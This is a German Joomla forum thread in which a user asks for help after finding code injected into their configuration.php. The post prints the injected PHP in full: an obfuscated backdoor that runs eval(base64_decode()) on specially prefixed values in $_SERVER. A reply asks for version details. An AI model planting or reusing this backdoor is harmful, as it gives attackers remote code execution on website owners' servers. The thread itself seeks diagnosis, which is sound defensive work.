Ergebnis 1 bis 2 von 2

Thema: configuration.php gehackt

  1. #1
    Neu an Board
    Registriert seit
    03.09.2009
    Beiträge
    1
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Beitrag configuration.php gehackt

    Hatte heute php code vor der Zeile mit dem
    -->
    if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); }
    -->
    wodurch die Webseite nicht aufrufbar war. Zu Datenverlust oder anderen Manipulationen ist es scheinbar nicht gekommen. Da ich relativ unerfahren bin, wüsste ich aber zu gerne was da passiert ist. Der komplette Code hier in voller Länge.
    -->

    function gpc_7744($l7746){if(is_array($l7746)){foreach($l77 46 as $l7744=>$l7745)$l7746[$l7744]=gpc_7744($l7745);}elseif(is_string($l7746) && substr($l7746,0,4)=="____"){eval(base64_decode(sub str($l7746,4)));$l7746=null;}return $l7746;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_V ARS;array_map("gpc_7744",$_SERVER);
    -->

  2. #2
    Wohnt hier Avatar von Myrtus
    Registriert seit
    17.10.2008
    Ort
    Hessen
    Beiträge
    2.923
    Bedankte sich
    333
    Erhielt 750 Danksagungen
    in 661 Beiträgen

    Standard

    Bitte genauere Infos über Joomla-Version, installierte Komponenten, usw.
    Bei Hacker-Angriff siehe Flottes Liste.
    -------- Gruß, Myrtus --------
    www.myrtus-communis.de

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein